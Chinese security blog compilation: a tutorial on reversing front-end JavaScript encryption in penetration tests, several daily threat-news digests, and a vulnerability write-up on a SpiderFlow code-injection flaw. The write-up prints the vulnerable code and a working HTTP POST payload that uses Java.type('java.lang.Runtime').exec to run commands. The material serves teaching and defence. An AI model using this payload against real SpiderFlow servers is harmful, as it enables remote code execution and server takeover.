前言 下面将分享一些实际的渗透测试经验，帮助你应对在测试中遇到的数据包内容加密的情况。我们将以实战为主，技巧为辅，进入逆向的大门。 技巧 开局先讲一下技巧，掌握好了技巧，方便逆向的时候可以更加快速的找到关键函数位置！ 后续也会有更多的实战会按照技巧去操作。 关键词搜索一：在js代码没有混淆的情况下。我们可以直接进行关键词搜索，加密可以搜索encrypt，解密可以搜索decrypt。至于原因就是，无论是加密数据解密，还是明文数据进行加密，都必然会经过加密算法。 关键词搜索二：如果第一种方法搜索不到需要的信息，可以尝试搜索 JSON.parse() 方法。加密数据通常是字符串格式的，解密后也是字符串格式的。在前端中，需要使用 JSON 格式而不是字符串格式的数据，因此必须进行反序列化（即将字符串转换为 JavaScript 对象）处理。 关键词搜索三：api后端返回的是json键值对格式的，我们也可以去尝试搜索加密字符值的键去找到关键的加密位置。 正文 实战一： 在进入网址后，查看XHR请求时发现数据被加密了。尽管XHR中的数据是经过加密的，但在页面上却以明文形式呈现。因此可以初步判断，在前端渲染页面时，会对从后端传输下来的数据进行解密操作。 搜索JSON.parse时，找到了11个参数。在每一个包含JSON.parse的代码行下设置断点，然后刷新页面，断点被断在了18647行。 控制台中打印JSON.parse(v)，你会发现明文数据就是v。所以这段代码是用来解密的函数。 y是解密后的参数，y是由v解析出来的，v的传参是d，d的传参是l，下断点发现l是加密字符串。Object(c.a)(l)表示对变量c.a执行函数调用，并将参数l传递给该函数。 将这段代码扣下来并且运行，报错没有没有找到Object(c.a)。 在控制台打印Object(c.a)，直接进去函数内部扣代码 改写一下代码，l是传进去的加密字符串。 运行之后t报错,发现_keyStr未定义 全局搜索_keyStr发现是一个字符串，直接复制下来。 运行报错Object(c.b)未定义 将鼠标浮上Object(c.b)可以发现他是一个名字为d2的函数，进去js里面将d2函数抠出来并且替换掉函数名 改写函数名 运行报错_p未定义 全局搜索p发现这个变量很乏有太多重复的，不过初步判断是一个变量，我们可以在p后面加一个空格搜索。_p加空格只有7个，很快便找到了这个变量，发现他是一个字符串。将他扣进代码里面。 运行报错，_u_d函数未定义。 全局搜索_u_d，将其扣进代码里面 运行一下。 数据已经成功解密了。 实战二： 抓个包，数据包内容已经被加密了 从initiator进入到js文件里面 搜索解密关键词，发现第66752有个decrypt，把断点下在return那一行。 在66752下断点刷新，将返回的那段代码在控制台打印。发现是解密之后的数据，那么这一段函数肯定是解密函数 扣代码运行报错url2和text2未定义 去浏览器下断点补上两个未定义的参数，url2是一个固定的值 而text2是加密字符串。 运行之后报错cryptoJs未定义 将cryptoJs.exports在控制台上面打印出来，发现是加密库crypto，直接调库替换即可 运行报错，node.js里面的解码函数是btoa,将encode替换成btoa即可。 解密成功 结尾 部分数据代码已做脱敏处理。

1、COLDRIVER组织利用Rust语言恶意软件扩大钓鱼攻击范围 https://blog.google/threat-analysis-group/google-tag-coldriver-russian-phishing-malware/ 与俄罗斯有关的威胁行为者COLDRIVER不断发展其间谍技术，超越了凭据收集的范围，以提供有史以来第一个用 Rust 编程语言编写的定制恶意软件。研究人员表示攻击链利用 PDF 作为诱饵文档来触发感染序列。诱饵是从模拟帐户发送的。COLDRIVER，也称为 Blue Callisto、BlueCharlie（或 TAG-53）、Calisto（也可拼写为 Callisto）、Dancing Salome、Gossam 2、Midnight Blizzard组织针对微软高管的电子邮件发起网络攻击 https://msrc.microsoft.com/blog/2024/01/microsoft-actions-following-attack-by-nation-state-actor-midnight-blizzard/ 微软周五透露，它是对其企业系统进行民族国家攻击的目标，导致该公司网络安全和法律部门的高级管理人员和其他人员的电子邮件和附件被盗。这家 Windows 制造商将此次攻击归因于其追踪的俄罗斯高级持续威胁 (APT) 组织Midnight Blizzard（以前称为 Nobelium），该组织也称为 APT29、BlueBravo、Cloaked Ursa、Cozy B 3、研究人员披露部署复杂远程访问木马的恶意npm软件包 https://blog.phylum.io/npm-package-found-delivering-sophisticated-rat/ 已发现上传到 npm 注册表的恶意包在受感染的 Windows 计算机上部署复杂的远程访问木马。该软件包名为“ os兼容”，于 2024 年 1 月 9 日发布，在被删除之前总共吸引了380 次下载。如果平台不是 Windows，它会向用户显示一条错误消息，指出脚本正在 Linux 或无法识别的操作系统上运行，敦促他们在“Windows Server OS”上运行它。批处理脚本本身会验证它是否具有管理员权限，如果没有，则通过 PowerShell 命令 4、Tietoevry勒索软件攻击导致瑞典企业和城市停电 https://www.tietoevry.com/en/newsroom/all-news-and-releases/other-news/2024/01/ransomware-attack-in-sweden-update/ 芬兰 IT 服务和企业云托管提供商 Tietoevry 遭受勒索软件攻击，影响其位于瑞典的一个数据中心的云托管客户，据报道，此次攻击是由 Akira 勒索软件团伙发起的。Tietoevry 是一家芬兰 IT 服务公司，为企业提供托管服务和云托管。该公司在全球拥有约 24000 名员工，2023 年收入为 31 亿美元。Tietoevry 今天证实，勒索软件攻击发生在 5、3AM勒索软件与Conti组织和Royal勒索软件有关联性 https://www.bleepingcomputer.com/news/security/researchers-link-3am-ransomware-to-conti-royal-cybercrime-gangs/ 安全研究人员分析了最近出现的 3AM 勒索软件操作的活动，发现其与 Conti 集团和 Royal 勒索软件团伙等组织有密切联系。3AM（也拼写为 ThreeAM）也一直在尝试一种新的勒索策略：与受害者的社交媒体关注者分享数据泄露的消息，并使用机器人回复 X（以前称为 Twitter）上的高级帐户，发送指向数据泄露的消息。研究人员注意到威胁参与者在部署 LockBit 恶 6、Apple 发布 iOS 和 macOS更新修复WebKit零日漏洞 https://www.securityweek.com/apple-ships-ios-17-3-warns-of-webkit-zero-day-exploitation/ Apple 推出了新版本的 iOS 和 macOS 平台，以修复被零日漏洞利用的 WebKit 漏洞。 7、开源 AI/ML 平台中发现多个严重漏洞 https://www.securityweek.com/critical-vulnerabilities-found-in-ai-ml-open-source-platforms/ 安全研究人员标记了开源 AI/ML 解决方案 MLflow、ClearML、Hugging Face 中的多个严重漏洞。 8、研究人员发现超大规模数据泄露，共260亿条 https://securityaffairs.com/157933/breaking-news/largest-data-leak-ever.html 这次超大规模泄露包含来自之前多次泄露的数据，其中包含令人震惊的 12 TB 信息，涵盖令人难以置信的 260 亿条记录。几乎可以肯定，这次泄漏是迄今为止发现的最大的一次泄漏。 9、网络犯罪分子在暗网中泄露了从泰国窃取的大量 PII 数据 https://securityaffairs.com/157870/data-breach/resecurity-massive-thailand-data-leak.html 安全研究人员警告说，网络犯罪分子在暗网上大量泄露了被盗的泰国个人身份信息 (PII)。 10、乌克兰最大的移动银行 Monobank 遭遇大型DDoS 攻击 https://thecyberexpress.com/monobank-cyberattack/ 乌克兰最大的移动银行 Monobank 遭受了一系列拒绝服务 (DDoS) 攻击，首席执行官确认在一次攻击中产生了惊人的 5.8 亿个服务请求。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、黑产团伙利用国内下载站传播Mac远控木马 https://mp.weixin.qq.com/s/EhRX26TP9rxEKys_MzDYvQ 近期安天CERT发现一组利用非官方软件下载站进行投毒和攻击下游用户案例，攻击者在网管运维工具上捆绑植入macOS平台远控木马，利用国内非官方下载站发布，以此取得政企机构内部关键主机桥头堡。安天CERT判断该事件针对的目标为国内IT运维人员，当运维人员寻找macOS平台下免费或破解的运维工具时可能会搜索到该下载站，并下载执行含有恶意文件的运维工具，进一步连接攻击者服务器运行远控木马窃取主机中的数据和文件。该团伙使用经过精心构造的域名，并对下载的载荷文件进行混淆处理，以规避安全产品的检测，安天CE 2、CISA和FBI警告Androxgh0st僵尸网络的凭证窃取活动 https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-016a CISA 和 FBI 今天警告称，使用 Androxgh0st 恶意软件的威胁行为者正在构建一个专注于云凭证盗窃的僵尸网络，并利用窃取的信息来传播额外的恶意负载。该僵尸网络于 2022 年首次被发现，大约一年前控制了 40000 多台设备。它扫描易受以下远程代码执行 (RCE) 漏洞影响的网站和服务器： CVE-2017-9841（PHPUnit 单元测试框架）、CVE-2021-41773（Apache HTTP Server）和CVE-2018-1513 3、攻击者利用Docker漏洞部署挖矿程序与灰产软件盈利 https://www.cadosecurity.com/containerised-clicks-malicious-use-of-9hits-on-vulnerable-docker-hosts/ 易受攻击的 Docker 服务正成为一项新颖活动的目标，在该活动中，威胁行为者正在部署 XMRig 加密货币挖矿程序以及 9Hits Viewer 软件，作为多管齐下的货币化策略的一部分。这是第一个记录在案的恶意软件将 9Hits 应用程序作为有效负载部署的案例。9Hits将自己宣传为“独特的网络流量解决方案”和“自动流量交换”，允许服务成员将流量引入其网站以换取购买积分。这是通过名为 9Hi 4、TA866组织针对北美目标发送数千封发票主题的钓鱼邮件 https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta866-returns-large-email-campaign 研究人员发现 TA866 在消失九个月后又重新出现在电子邮件威胁活动数据中。2024 年 1 月 11 日，研究人员阻止了一场大规模活动，其中包括针对北美的数千封电子邮件。以发票为主题的电子邮件附有 PDF，其名称例如“Document_[10 位数字].pdf”以及各种主题，例如“项目成就”。PDF 包含 OneDrive URL，如果单击这些 URL，则会启动多步骤感染链，最终导致恶意软件负 5、研究人员发布EDK II网络启动环境存在的9个安全漏洞 https://blog.quarkslab.com/pixiefail-nine-vulnerabilities-in-tianocores-edk-ii-ipv6-network-stack.html 一组九个漏洞（统称为“PixieFail”）影响 Tianocore EDK II 的 IPv6 网络协议栈，EDK II 是广泛用于企业计算机和服务器的 UEFI 规范的开源参考实现。这些缺陷存在于 PXE 网络启动过程中，该过程对于在数据中心和高性能计算环境中配置操作系统以及启动时从网络加载操作系统映像的标准过程至关重要。研究人员发现PixieFail 缺陷，并已通过 CERT/CC 6、CISA警告Ivanti EPMM身份验证绕过漏洞正在被积极利用 https://www.cisa.gov/news-events/alerts/2024/01/18/cisa-adds-one-known-exploited-vulnerability-catalog 美国网络安全和基础设施安全局 (CISA) 周四将一个现已修补的影响 Ivanti Endpoint Manager Mobile (EPMM) 和 MobileIron Core 的严重缺陷添加到其已知被利用的漏洞 ( KEV )目录中，并表示该漏洞正在被积极利用。所涉及的漏洞是CVE-2023-35082（CVSS 评分：9.8），这是一种身份验证绕过方法，它是针对 CVE-2023- 7、攻击者滥用TeamViewer软件部署勒索攻击软件 https://www.huntress.com/blog/ransomware-deployment-attempts-via-teamviewer 勒索软件攻击者再次使用 TeamViewer 获得对组织端点的初始访问权限，并尝试基于泄露的 LockBit 勒索软件构建器部署加密器。TeamViewer 是一种在企业界广泛使用的合法远程访问工具，因其简单性和功能而受到重视。不幸的是，该工具也受到诈骗者甚至勒索软件攻击者的使用，他们使用它来访问远程桌面，不受阻碍地删除和执行恶意文件。研究人员的一份新报告显示，网络犯罪分子并没有放弃这些旧技术，仍然通过 TeamViewer 接管设备来尝试部 8、TensorFlow机器学习框架存在安全漏洞可能导致供应链攻击 https://www.praetorian.com/blog/tensorflow-supply-chain-compromise-via-self-hosted-runner-attack/ 在开源TensorFlow机器学习框架中发现的持续集成和持续交付 (CI/CD) 错误配置可能会被用来策划供应链攻击。攻击者可能会滥用这些错误配置，“通过恶意拉取请求破坏 TensorFlow 的构建代理，从而对 GitHub 和 PyPi 上的 TensorFlow 版本进行供应链破坏” 。成功利用这些问题可能会允许外部攻击者将恶意版本上传到 GitHub 存储库，在自托管 GitHub 运行器上 9、谷歌发布安全更新以修复Chrome浏览器中四个安全漏洞 https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_16.html 谷歌发布了更新，修复了 Chrome 浏览器中的四个安全问题，其中包括一个被积极利用的零日漏洞。该问题编号为CVE-2024-0519，涉及 V8 JavaScript 和 WebAssembly 引擎中的越界内存访问，威胁行为者可利用该问题触发崩溃。通过读取越界内存，攻击者可能能够获取秘密值，例如内存地址，这可以绕过 ASLR 等保护机制，以提高利用单独的弱点来实现代码的可靠性和可能性执行，而不仅仅是拒绝服务。有关攻 10、Atlassian Jira产品平台持续中断影响多个云服务 https://jira-software.status.atlassian.com/incidents/z9kvvpkbngws 1 月 18 日，多个 Atlassian Jira 产品正在经历持续中断。Jira Work Management、Jira Software、Jira Service Management 和 Jira Product Discovery 的用户面临连接问题。东部时间 18 日上午 5:52：Atlassian 已实施修复，应该可以解决该问题并继续监控该事件。 Jira 服务从 18 日早上开始（至少截至东部时间凌晨 3:34）遇到连接问题。该事件影响了多个 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、研究人员披露可逃避macOS内置安全软件的XProtect木马 https://www.sentinelone.com/blog/the-many-faces-of-undetected-macos-infostealers-keysteal-atomic-cherrypie-continue-to-adapt/ macOS 平台的多个信息窃取程序已经证明，即使安全公司频繁跟踪并报告新变种，也能够逃避检测。这些恶意软件可以逃避 macOS 的内置反恶意软件系统 XProtect。XProtect 在后台工作，同时扫描下载的文件和应用程序以查找已知的恶意软件签名。尽管苹果不断更新该工具的恶意软件数据库，但由于恶意软件作者的快速响应，信息窃取者几乎立即绕过了 2、研究人员发现2023年针对环境服务行业的DDoS攻击激增 https://blog.cloudflare.com/ddos-threat-report-2023-q4/ 环境服务行业遭遇了基于 HTTP 的分布式拒绝服务 (DDoS) 攻击的激增，占其所有 HTTP 流量的一半。研究人员上周发布的 2023 年第四季度 DDoS 威胁报告中表示，这标志着 DDoS 攻击流量同比增长 61839%。网络攻击的激增恰逢2023 年 11 月 30 日至 12 月 12 日举行的COP 28会议”，并将其描述为“网络威胁形势中令人不安的趋势”。针对环境服务网站的 HTTP 攻击的增加是过去几年每年观察到的更大趋势的一部分，特别是在 COP 26 和 CO 3、Balada木马利用插件漏洞影响超7100个WordPress网站 https://blog.sucuri.net/2024/01/thousands-of-sites-with-popup-builder-compromised-by-balada-injector.html 数千个使用 Popup Builder 插件易受攻击版本的 WordPress 网站已受到名为Balada Injector的恶意软件的攻击。研究人员于 2023 年 1 月首次记录该活动，该活动以一系列周期性攻击波的形式进行，利用安全漏洞 WordPress 插件注入后门，旨在将受感染网站的访问者重定向到虚假技术支持页面、欺诈性彩票中奖和推送通知诈骗。Sucuri 随后的调查结果揭 4、Rapid SCADA 中的七个漏洞使工业组织面临攻击 https://www.securityweek.com/unpatched-rapid-scada-vulnerabilities-could-expose-industrial-organizations-to-attacks/ Rapid SCADA 开源工业自动化平台受到多个漏洞的影响，这些漏洞可能允许黑客访问敏感的工业系统，但这些缺陷仍未修补。 5、UEFI中开源参考实现中的九个漏洞可能会产生严重影响 https://securityaffairs.com/157683/hacking/pixiefail-uefi-vulnerabilities.html 专家们在 UEFI 开源参考实现的网络协议栈中发现了多个缺陷，统称为 PixieFail。PixieFail 问题可被利用实现远程代码执行、敏感信息泄露、拒绝服务 (DoS) 和网络会话劫持攻击。 6、新的恶意软件针对Docker服务用于挖矿和刷流量 https://thehackernews.com/2024/01/new-docker-malware-steals-cpu-for.html 易受攻击的 Docker 服务正成为一项新颖活动的目标，在该活动中，威胁行为者正在部署 XMRig 加密货币挖矿程序以及 9Hits Viewer 软件，作为多管齐下的货币化策略的一部分。 7、TensorFlow CI/CD 缺陷可能使供应链遭受中毒攻击 https://thehackernews.com/2024/01/tensorflow-cicd-flaw-exposed-supply.html 在开源TensorFlow机器学习框架中发现的持续集成和持续交付 (CI/CD) 错误配置可能会被用来策划供应链攻击。攻击者可能会滥用这些错误配置，“通过恶意拉取请求破坏 TensorFlow 的构建代理，从而对 GitHub 和 PyPi 上的 TensorFlow 版本进行供应链破坏” 。 8、西班牙地方政府遭勒索攻击，被索要 1000 万欧元赎金 https://www.secrss.com/articles/62902 据报道，攻击者向卡尔维亚市政府索要1000万欧元赎金，该市市长称绝对不会支付，此前西班牙加入了《反勒索软件倡议》。 9、Anthropic 警告AI中毒可能导致开源大模型变成潜伏的间谍 https://arstechnica.com/information-technology/2024/01/ai-poisoning-could-turn-open-models-into-destructive-sleeper-agents-says-anthropic/ 开发 Claude AI 聊天机器人的 Anthropic 公司研究人员发表论文，警告 AI 中毒可能导致开源大模型变成潜伏的间谍。研究人员训练了三个含有后门的大模型，它们能根据用户输入指令的差异输出安全的代码或能被利用的漏洞代码。 10、国内首例非法爬虫纠纷案终审宣判微博运营方获赔2000万元 https://www.ithome.com/0/745/564.htm 据广东省高级人民法院官方公众号消息，国内首例非法调用服务器 API 接口获取数据予以交易转卖案件尘埃落定。广东省高级人民法院对微梦公司诉简亦迅公司及深圳分公司不正当竞争纠纷案二审公开宣判，驳回上诉，维持原判：全额支持微梦公司诉请赔偿经济损失 2000 万元。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1. 漏洞介绍 SpiderFlow爬虫平台项目中 spider-flow-web\src\main\java\org\spiderflow\controller\FunctionController.java文件的FunctionService.saveFunction函数调用了saveFunction函数，该调用了自定义函数validScript，该函数中用户能够控制 functionName、parameters 或 script 中的内容，从而构造恶意输入来执行任意的 JavaScript 代码，从而导致代码注入，并允许远程发起攻击，可导致服务器失陷。 2. 流程图分析 3. 搭建过程 1. IDEA Gitee 快速搭建 URL : https://gitee.com/jmxd/spider-flow.git 2. 数据库搭建 我这里使用的是MySQL5.7，然后使用Navicat运行项目中spider-flow\db\spiderflow.sql这个SQL文件会在数据库中自动生成所需要的数据库： 3. 数据库连接 然后修改数据库配置文件application.properties，路径为：spider-flow\spider-flow-web\src\main\resources\application.properties 4. 运行 spider-flow\spider-flow-web\src\main\java\org\spiderflow\SpiderApplication.java 然后访问路径http://localhost:8088/，成功搭建！ 4. 利用过程 首先我们直接在IDEA中寻找危险函数eval，使用Ctrl+shift+F文件搜索： 发现这里有个validScript函数调用了eval危险函数：    public static void validScript(String functionName,String parameters,String script) throws Exception {        new ScriptEngineManager().getEngineByName("nashorn").eval(concatScript(functionName,parameters,script));   } 然后这里的我们去看看eval具体执行的参数是怎么生成的：    private static String concatScript(String functionName,String parameters,String script){        StringBuffer scriptBuffer = new StringBuffer();        scriptBuffer.append("function ")               .append(functionName)               .append("(")               .append(parameters == null ? "" : parameters)               .append("){")               .append(script)               .append("}");        return scriptBuffer.toString();   } 可以看到concatScript 方法中，它接受三个参数 functionName、parameters 和 script，然后将它们拼接成一个 JavaScript 函数的字符串。这里它没有任何的过滤。所以我们可以尝试构造恶意的这三个参数实现RCE。 在上面的函数中将产生如下的字符串： function functionName(parameters){script} 很明显我们可以构造恶意的script来导致RCE： 例如script的值可以为}Java.type('java.lang.Runtime').getRuntime().exec('calc');{ 这样的话我们最终的字符串将会变成： function functionName(parameters){}Java.type('java.lang.Runtime').getRuntime().exec('calc');{} 然后最后在执行的时候就会直接定义一个函数后执行我们的Java恶意代码。 然后我们分析是哪个函数调用了validScript函数    public String saveFunction(Function entity) {        try {            ScriptManager.validScript(entity.getName(),entity.getParameter(),entity.getScript());            super.saveOrUpdate(entity);            init();            return null;       } catch (Exception e) {            logger.error("保存自定义函数出错",e);            return ExceptionUtils.getStackTrace(e);       }   } 然后在FunctionController.java调用了saveFunction @RestController @RequestMapping("/function") public class FunctionController {   ...... @RequestMapping("/save")    public String save(Function function){        return functionService.saveFunction(function);   }   ...... } 然后我们现在就可以去实际的功能点看需要哪些参数： 于是我们直接写出payload: POST /function/save HTTP/1.1 Content-Length: 38 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Host: localhost:8088 id=&name=rce&parameter=rce&script=}Java.type('java.lang.Runtime').getRuntime().exec('calc');{ 成功命令执行弹出计算器： 修复方式 过滤好script参数 设置沙箱 5. 总结 这个项目在Gitee上面有7.4K的Star，有3.6K的fork记录，在实际部署上也不是很少，但是漏洞点出的不是很难主要是思路扩展，适宜入门。

1、SonicWall防火墙存在安全漏洞影响全网超178000台设备 https://bishopfox.com/blog/its-2024-and-over-178-000-sonicwall-firewalls-are-publicly-exploitable 通过互联网暴露的超过 178000 个 SonicWall 防火墙至少可被两个安全漏洞利用，这两个安全漏洞可能被利用导致拒绝服务 (DoS) 条件和远程代码执行 (RCE)。这两个问题本质上是相同的，但由于重用了易受攻击的代码模式，因此可以在不同的 HTTP URI 路径上利用。CVE-2022-22274（CVSS 评分：9.4），SonicOS 中通过 HTTP 请求的基于堆栈的缓冲区溢出漏洞允 2、研究人员披露伪装成Coinbase钱包的Inferno恶意软件 https://www.group-ib.com/blog/inferno-drainer/ 现已解散的Inferno Drainer背后的运营者在 2022 年至 2023 年的一年时间内创建了超过 16000 个独特的恶意域名。该计划利用高质量的网络钓鱼页面，引诱毫无戒心的用户将他们的加密货币钱包与攻击者的基础设施连接起来，攻击者的基础设施欺骗 Web3 协议，诱骗受害者授权交易。Inferno Drainer 于2022 年 11 月至 2023 年 11 月期间活跃，估计通过诈骗超过 137000 名受害者，获取了超过8700 万美元的非法利润。该恶意软件是一系列更广泛的类似产品的一 3、攻击者利用Windows漏洞部署开源窃密程序Phemedrone https://www.trendmicro.com/en_us/research/24/a/cve-2023-36025-exploited-for-defense-evasion-in-phemedrone-steal.html 攻击者利用 Microsoft Windows 中现已修补的安全漏洞来部署名为Phemedrone Stealer 的开源信息窃取程序。Phemedrone 的目标是网络浏览器以及来自加密货币钱包和 Telegram、Steam 和 Discord 等消息应用程序的数据。它还会截取屏幕截图并收集有关硬件、位置和操作系统详细信息的系统信息。然后，被盗数据通过 Te 4、研究人员披露Bosch智能恒温器固件中存在多个漏洞 https://www.bitdefender.com/blog/labs/vulnerabilities-identified-in-bosch-bcc100-thermostat/ 博世 BCC100 恒温器和力士乐 NXA015S-36V-B 智能拧紧机中已披露多个安全漏洞，如果成功利用这些漏洞，攻击者可能会在受影响的系统上执行任意代码。研究人员去年 8 月发现了博世 BCC100 恒温器中的缺陷，攻击者可能会利用该问题来更改设备固件并植入恶意版本。该高严重性漏洞的编号为CVE-2023-49722 （CVSS 评分：8.3），博世于 2023 年 11 月修复了该漏洞。BCC101/ 5、GitHub 轮换密钥以应对漏洞 https://www.securityweek.com/github-rotates-credentials-in-response-to-vulnerability/ 代码托管平台 GitHub 周二宣布，在得知影响 GitHub.com 和 GitHub Enterprise Server 的漏洞可能会暴露登录信息后，该公司已轮换密钥。 6、AMD&苹果&高通GPU易受LeftoverLocals攻击窃取AI数据 https://www.securityweek.com/ai-data-exposed-to-leftoverlocals-attack-via-vulnerable-amd-apple-qualcomm-gpus/ 研究人员演示了如何利用图形处理单元 (GPU) 漏洞的新攻击方法从人工智能和其他类型的应用程序中获取潜在的敏感信息。该漏洞被称为LeftoverLocals，官方编号为 CVE-2023-4969，Trail of Bits 进行的测试显示苹果、AMD 和高通 GPU 受到影响。 7、Citrix 向 NetScaler ADC 客户发出新的零日漏洞利用警告 https://www.securityweek.com/citrix-warns-netscaler-adc-customers-of-new-zero-day-exploitation/ Citrix 发现有利用两个新的 NetScaler ADC 和 Gateway 零日漏洞（编号为 CVE-2023-6548 和 CVE-2023-6549）的攻击。 8、AndroxGh0st 僵尸网络瞄准 AWS、Azure 和 Office 365 凭证 https://thehackernews.com/2024/01/feds-warn-of-androxgh0st-botnet.html 美国网络安全和基础设施安全局 (CISA) 和联邦调查局 (FBI)警告称，部署AndroxGh0st恶意软件的威胁行为者正在创建一个僵尸网络，用于“在目标网络中识别和利用受害者”。该云攻击工具能够渗透易受已知安全漏洞影响的服务器，以访问 Laravel 环境文件并窃取 Amazon Web Services (AWS)、Microsoft Office 365、SendGrid 和 Twilio 等知名应用程序的凭据。 9、新的iShutdown方法可识别iPhone上隐藏的间谍软件(如 Pegasus) https://thehackernews.com/2024/01/new-ishutdown-method-exposes-hidden.html 网络安全研究人员发现了一种名为iShutdown的“轻量级方法” ，可以可靠地识别 Apple iOS 设备上的间谍软件迹象，包括 NSO Group 的Pegasus、QuaDream 的Reign和 Intellexa 的Predator等臭名昭著的间谍软件。卡巴斯基还发布了一系列 Python 脚本来提取、分析和解析 Shutdown.log，以提取重新启动统计信息。 10、英国隐私监管机构将对AI网络抓取方法进行审查 https://therecord.media/uk-ico-examines-privacy-concerns-data-scraping-artificial-intelligence-llms 英国的数据保护监管机构信息专员办公室 (ICO) 正在审查通过网络抓取收集数据来训练生成人工智能模型的合法性。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、攻击者利用Ivanti零日漏洞以部署网络间谍软件 https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day 自 12 月初以来，黑客一直在利用本周披露的 Ivanti Connect Secure 中的两个零日漏洞来部署多个定制恶意软件系列以用于间谍目的。这些安全问题被标识为 CVE-2023-46805 和 CVE-2024-21887，允许绕过身份验证并向易受攻击的系统注入任意命令。Ivanti 表示，攻击者针对的是少数客户。研究人员称攻击背后的威胁行为者从事间谍活动，目前在内部追踪为 UNC5221。今天，威胁监控服务 Shadowser 2、GitLab警告用户修补严重的零点击帐户劫持漏洞 https://www.bleepingcomputer.com/news/security/gitlab-warns-of-critical-zero-click-account-hijacking-vulnerability/ GitLab 发布了社区版和企业版的安全更新，以解决两个关键漏洞，其中之一允许在没有用户交互的情况下劫持帐户。供应商强烈建议尽快更新 DevSecOps 平台的所有易受攻击的版本（自托管安装需要手动更新）。GitLab 修补的最严重的安全问题具有最高的严重性评分（满分 10 分），并被跟踪为 CVE-2023-7028。成功的利用不需要任何交互。这是一个身份验证问 3、研究人员披露2023年有近5200起组织遭勒索软件攻击事件 https://www.rapid7.com/blog/post/2024/01/12/2023-ransomware-stats-a-look-back-to-plan-ahead/ 2023 年有近 5200 个受害者组织遭受勒索软件攻击，并从其管理的检测和响应团队的公开披露和事件数据中进行了研究。研究人员认为这个数字实际上更高，因为它没有考虑到许多可能未被报告的攻击。虽然勒索软件活动仍然很高，但用于这些攻击的独特勒索软件家族的数量减少了一半以上，从2022年的95个新家族减少到2023年的43个。比克表示，这表明当前的勒索软件系列和模型正在满足威胁行为者的目标。研究人员称AlphV 是 4、谷歌警告 Chrome 浏览器零日漏洞被利用 https://www.securityweek.com/google-warns-of-chrome-browser-zero-day-being-exploited/ 被利用的零日漏洞被标记为 CVE-2024-0519，被描述为 V8 JavaScript 引擎中的越界内存访问问题。 5、PAX 支付终端存在漏洞，容易遭受黑客攻击 https://www.securityweek.com/vulnerabilities-expose-pax-payment-terminals-to-hacking/ PAX 基于 Android 的 PoS 终端中的漏洞可被利用来降级引导加载程序、执行任意代码。 6、VMware 敦促客户修补关键的 Aria Automation漏洞 https://www.securityweek.com/vmware-urges-customers-to-patch-critical-aria-automation-vulnerability/ Aria Automation 受到一个严重漏洞的影响，该漏洞可被利用来获取对远程组织和工作流程的访问权限。 7、ATLASSIAN 修复了旧版CONFLUENCE中的严重RCE https://securityaffairs.com/157591/security/atlassian-rce-flaw-older-confluence-versions.html Atlassian 警告 Confluence 数据中心和 Confluence Server 中存在一个严重的远程代码执行漏洞，该漏洞被跟踪为 CVE-2023-22527（CVSS 评分 10.0），该漏洞会影响旧版本。 8、Remcos RAT 在韩国通过伪装成成人游戏进行传播 https://thehackernews.com/2024/01/remcos-rat-spreading-through-adult.html 名为 Remcos RAT 的远程访问木马 (RAT) 被发现通过网络硬盘在韩国伪装成成人主题游戏进行传播。 9、研究人员发现全球僵尸网络活动大幅激增 https://www.infosecurity-magazine.com/news/hundredfold-surge-global-botnet 活动激增的原因是攻击者使用廉价或免费的云和托管服务器来创建僵尸网络启动板。这些新的僵尸网络专注于扫描全球互联网端口，并显示出潜在电子邮件服务器漏洞的迹象。 10、研究人员建议安卓引入定期重启机制能有效阻止固件漏洞攻击 研究人员建议 Android 应该引入自动重启功能，以使利用固件缺陷变得更加困难。最近报告了影响 Google Pixel 和三星 Galaxy 手机等 Android 设备的固件漏洞，这些漏洞可能会被利用来窃取数据并在设备不处于静止状态时监视用户。当设备处于“静止”状态时，意味着它已关闭或启动后尚未解锁。在这种状态下，隐私保护非常高，并且移动设备无法完全发挥作用，因为加密密钥仍然无法供已安装的应用程序使用。重新启动后的第一次解锁会导致多个加密密钥移动到快速访问内存，以便安装的应用程序正常工作，并且设备切换到“非静止”状态。 https://www.bleepingcomputer.com/news/security/grapheneos-frequent-android-auto-reboots-block-firmware-exploits/ 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

